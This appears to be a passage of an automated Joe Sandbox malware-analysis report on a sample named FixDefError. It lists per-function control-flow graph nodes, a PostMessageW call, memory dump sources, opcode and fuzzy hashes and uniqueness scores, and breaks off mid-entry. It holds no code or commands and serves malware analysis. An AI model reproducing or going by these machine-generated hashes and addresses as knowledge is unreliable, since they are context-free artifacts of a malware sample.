                                                                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                                                                      • Opcode ID: 49a77c64afa2e3f4d16edb84f7c2ce3ca18e16e98c648f0c151f1663c1f52f40
                                                                                                                                                                                                                      • Instruction ID: 47c66526130d0a790b4345b01d2777ed51b8a56d1300d99c9436b73d03317122
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49a77c64afa2e3f4d16edb84f7c2ce3ca18e16e98c648f0c151f1663c1f52f40
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A1106B58002489FDB10DF9AD984BEFBFF8EB58324F248459E555A7700C375A584CFA1
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 09DE2C60 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 106 9de2c60-9de2cca PostMessageW 107 9de2ccc-9de2cd2 106->107 108 9de2cd3-9de2ce7 106->108 107->108
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 09DE2CBD
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.327813357.0000000009DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DE0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9de0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                                                                      • Opcode ID: 143df228583fa4ce65662e8b7c43932c2450c012d8f0800d492ffe44abc7e260
                                                                                                                                                                                                                      • Instruction ID: 28529994d50790021d82f8733e637cbe0415e4bf4e3e1662af3d300f5a1ee4f5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 143df228583fa4ce65662e8b7c43932c2450c012d8f0800d492ffe44abc7e260
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B11E5B58003499FDB10DF9AD984BDEBFF8EB48324F108419E554A7700C375A994CFA1
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E65FC Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 256 84e65fc-84e667e 257 84e6686-84e66b7 256->257 258 84e66bd-84e66cb 257->258 259 84e66cd-84e66d3 258->259 260 84e66d4-84e6731 258->260 259->260 265 84e6733-84e6736 260->265 266 84e6740-84e6744 260->266 265->266 267 84e6746-84e6752 266->267 268 84e6755 266->268 267->268 270 84e6756 268->270 270->270
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: {eg
                                                                                                                                                                                                                      • API String ID: 0-1824077242
                                                                                                                                                                                                                      • Opcode ID: c447e234ce2d05f7ab76fbcfc56368ac599de72e1c4b3086a2531ed2af25c04d
                                                                                                                                                                                                                      • Instruction ID: ec1ace3aadd365ba6ab9a2d36fc74e2ffbbbaa923915c5ec8d36b502b617e047
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c447e234ce2d05f7ab76fbcfc56368ac599de72e1c4b3086a2531ed2af25c04d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3641F2B1D003498FDB24CFA9C584ADEBFF5AF58305F25802AE409BB205D7756A89CF91
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E5D3C Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 271 84e5d3c-84e66b7 274 84e66bd-84e66cb 271->274 275 84e66cd-84e66d3 274->275 276 84e66d4-84e6731 274->276 275->276 281 84e6733-84e6736 276->281 282 84e6740-84e6744 276->282 281->282 283 84e6746-84e6752 282->283 284 84e6755 282->284 283->284 286 84e6756 284->286 286->286
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: {eg
                                                                                                                                                                                                                      • API String ID: 0-1824077242
                                                                                                                                                                                                                      • Opcode ID: db9b76fa4198d224c3f158ae21cb497d649c95b6dd8b126a7a638f73c9874d6b
                                                                                                                                                                                                                      • Instruction ID: 483895a56bbd5dec8b1d5e5bb4fcdef924786bd05bc0e371e702df1942fb63d1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db9b76fa4198d224c3f158ae21cb497d649c95b6dd8b126a7a638f73c9874d6b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D41C4B1D00309DFDB14DFA9C584ADEBBF5AF68305F25801AE409BB204D7756A85CF91
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E6500 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 287 84e6500-84e6538 call 84e5d3c 291 84e653d-84e653f 287->291 292 84e65b8-84e65f0 291->292 293 84e6541-84e6580 291->293 302 84e6582-84e65ab 293->302 303 84e65b1-84e65b7 293->303 302->303
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: {eg
                                                                                                                                                                                                                      • API String ID: 0-1824077242
                                                                                                                                                                                                                      • Opcode ID: c382b56ace0d51af6b65181cfffa4a43e06a022e96c05eb20c71b1fece5fe2a8
                                                                                                                                                                                                                      • Instruction ID: d8beff714cb39d42f5e4e163bc73d0820ceebb758b25a06b2cf24eaecc81258d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c382b56ace0d51af6b65181cfffa4a43e06a022e96c05eb20c71b1fece5fe2a8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2721D5316002098FC701EB78C4184ABBBE6AFD0309705C5AEE586DB351DB75EC0ACBA1
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E64F0 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 306 84e64f0-84e6538 call 84e5d3c 311 84e653d-84e653f 306->311 312 84e65b8-84e65f0 311->312 313 84e6541-84e6580 311->313 322 84e6582-84e65ab 313->322 323 84e65b1-84e65b7 313->323 322->323
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: {eg
                                                                                                                                                                                                                      • API String ID: 0-1824077242
                                                                                                                                                                                                                      • Opcode ID: 5f0a590c8d348dba53df20758d5a85512af0aa2bc90141d3387b55f8306c5488
                                                                                                                                                                                                                      • Instruction ID: 224010764f440a79d24f2b7c89710c32bca4823205fc9b511e3cb6e5b9616ef7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f0a590c8d348dba53df20758d5a85512af0aa2bc90141d3387b55f8306c5488
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C321DF316002098FC710EB68C9148AFBBF6FFC1315745896AE592CB355EB74EC06CBA1
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E0040 Relevance: .8, Instructions: 752COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 1f9bd78b563ae0778c3c60940b5b85286f3bccef9217835b8fcf68d5de5cebe8
                                                                                                                                                                                                                      • Instruction ID: 1bdb48fe080015bbe6a6a728ce57b1a0e6935823bb9efc65b35307b3f0ebce96
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f9bd78b563ae0778c3c60940b5b85286f3bccef9217835b8fcf68d5de5cebe8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A62E3B0D00F418EDB745FF494487AE7AA1BB51306F604A2FE1BACA740D7B99482CF55
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E0006 Relevance: .5, Instructions: 480COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 66a8aae01874c5728cb7843b45af82c2647646e18d78e79b20da9be3037491de
                                                                                                                                                                                                                      • Instruction ID: c068d1df3a880c188114639ad4072787a1e29fefbe72a6b0133d06c63beb4339
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66a8aae01874c5728cb7843b45af82c2647646e18d78e79b20da9be3037491de
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68224AB4D05F424ED7705FE485842AEBA90BB16206F704A6FD0FA8A355C7B89087DF4A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E1C90 Relevance: .4, Instructions: 386COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 3c6bacdb3ecbefbb6a2105988c1acaf084f1b70656b8a709c4ed7f4debc865bd
                                                                                                                                                                                                                      • Instruction ID: 2494c23c7ba7946bf66872dcef53fab7a491333a0d8f90eefd15bba557128a06
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c6bacdb3ecbefbb6a2105988c1acaf084f1b70656b8a709c4ed7f4debc865bd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03E19534B002058FCB15EB79C4549AEBBF6EF89316B24445EE446EB791CB36DC41CBA1
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084EEF80 Relevance: .2, Instructions: 239COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 663afb28f3b5ddf1f98f286f2a235026962ebc4742ad9a67444023760255adc0
                                                                                                                                                                                                                      • Instruction ID: 0fee80980136fb233e5d366af2d00924f4d36b29561d28339d1c4e18d353a932
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 663afb28f3b5ddf1f98f286f2a235026962ebc4742ad9a67444023760255adc0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E515770E04208DFDB219FA9D9585ADFFB2FF84302F21419AE4417B296CB3599A5CF81
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E23C8 Relevance: .2, Instructions: 219COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: bb81289866ef212a773bb9cdf8b37ff2b7c090f77fd2b97122b84f033a9cb323
                                                                                                                                                                                                                      • Instruction ID: 1995b570100d9c53a1d811c6380b50de1ae68811175690fe70cc3168746c8dfa
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb81289866ef212a773bb9cdf8b37ff2b7c090f77fd2b97122b84f033a9cb323
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC810438B106148FCB18EF68D59896A77F6BF88606B1541AAF502CB371DB71EC45CB90
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084EDC68 Relevance: .2, Instructions: 211COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 924b397b427a22cc3cc09ba5471434cc6266154f75630b4f9cc69c44dffe806a
                                                                                                                                                                                                                      • Instruction ID: 3619586df731e8254dbf8ca4f04f99ae5f29b0b7dc0717789252486c87ad52fd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 924b397b427a22cc3cc09ba5471434cc6266154f75630b4f9cc69c44dffe806a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2591D275E0060A9FCB51CFA8C884AEEBBF2BF48311F14866AE969D7350D734E951CB50
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084EDC58 Relevance: .2, Instructions: 204COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: b10ea1585e3298ed8fdccde55ca4547d3bc53e21feb997398b4239a281a6eb42
                                                                                                                                                                                                                      • Instruction ID: dbce22f928242f2cefd5f27f3a57cf89b86566099c045621edccbea1d212a656
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b10ea1585e3298ed8fdccde55ca4547d3bc53e21feb997398b4239a281a6eb42
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD91D474E0060A8FCB55CFA8C484AEEBBF2BF48311F14865AE869DB351D734E955CB50
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084EA968 Relevance: .2, Instructions: 194COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 889a170c0bcb60d28508f1356440190109d610b2930a6ec3bcdcdf5fe43b3d70
                                                                                                                                                                                                                      • Instruction ID: 01709e9bd5b4eb4f64c391f4e7677916a058ede2c76179d17384dbf77e142ef2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 889a170c0bcb60d28508f1356440190109d610b2930a6ec3bcdcdf5fe43b3d70
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB610331A046058FDB12EB79C810ABE7BB5FF85316F0984ABE146DB3A2DF359805CB51
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E5568 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 34a72887b6766739b314437a231c4c1507c559f9d3abcdaf2c28671cf2295927
                                                                                                                                                                                                                      • Instruction ID: ab07a21729a153e989463528755302ec84cb8d13d526ec00dcbb8116322bffe9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34a72887b6766739b314437a231c4c1507c559f9d3abcdaf2c28671cf2295927
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94515B75E002489FCB14DBAAC848AAFBFF6EF98305F14841EE455E7350DB749905CBA1
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E8978 Relevance: .2, Instructions: 150COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 73bd685c28a53734b160d6b54c4f3a819d7fbdce2b54f896b5ddb00f0377e733
                                                                                                                                                                                                                      • Instruction ID: 7845067b1610a858b5271e21da6f9f974a8971af1426792dd145498ba68e894c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73bd685c28a53734b160d6b54c4f3a819d7fbdce2b54f896b5ddb00f0377e733
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56519074F002058FCB05EF78C8549AEBBB6FF89301B1485AEE445EB351DB35A906CB91
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E86A8 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 399809ed545e88e02f60867c56555f85e2692e8c603687c890bdebe292b078cc
                                                                                                                                                                                                                      • Instruction ID: 4530fa405c4f45d1e7153cd062186d8af38c98c93e22aa1031f411d26db23899
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 399809ed545e88e02f60867c56555f85e2692e8c603687c890bdebe292b078cc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46413934B101149FDB54DBA9C884EAEBBF6BF89706F1440AAF501EB361DA31D8018B61
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E2BD0 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 1fc95598455de6c15c44a00ca2cc0b82a6844b357a9730f48ff8e469558bc2be
                                                                                                                                                                                                                      • Instruction ID: 66c139f35a95764a6b879d92eb90acd57d64fa4f9b8a68e2ed16bb3979933a6c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1fc95598455de6c15c44a00ca2cc0b82a6844b357a9730f48ff8e469558bc2be
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B41CF70E00229CFDB28EBB5C4547ADBAB5EF88313F14452EF502A7384DBB44981CBA5
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E7AE8 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: e7b1286fce785c6a67353ee3537037a41e50a3aacef10afbeddd31a33c5bdb3a
                                                                                                                                                                                                                      • Instruction ID: 0c592cea3fc30f09b5a8b80d47100e8995dc8bb6f27dc8a5820855a529925d34
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7b1286fce785c6a67353ee3537037a41e50a3aacef10afbeddd31a33c5bdb3a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26416F34E012099FDB14DFA9D850AADBBB2EF89302F1445AAF441AB3A0DF30DD45CB50
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E61B0 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: ee6f70d6cdc1a00feea6107045995ae07e23165092f52e2933b1975ce3368dcf
                                                                                                                                                                                                                      • Instruction ID: 895909cb24ce3f67377f2c8f0ce353725e52307872e131d2d27813ecb3aa5075
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee6f70d6cdc1a00feea6107045995ae07e23165092f52e2933b1975ce3368dcf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6641E475B002194FCF04EBB9C8645BE7BF7AFC9345B14406AD446EB395DE388D0687A2
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084EF5A7 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: bbe88e2947a5c16b0a6d90a0c7254bda3c03d472d4bacb2a737a9c46870415d2
                                                                                                                                                                                                                      • Instruction ID: c512b5fb7a00a2b10724df4f678d1ff7ce1d4e46e54ac2b267bc7d9d4d66bcda
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bbe88e2947a5c16b0a6d90a0c7254bda3c03d472d4bacb2a737a9c46870415d2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35415B35E006059FDB04DFA9D890AADBBB2AF89312F1585AAF441BB3A0DF30D945CB50
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E3030 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
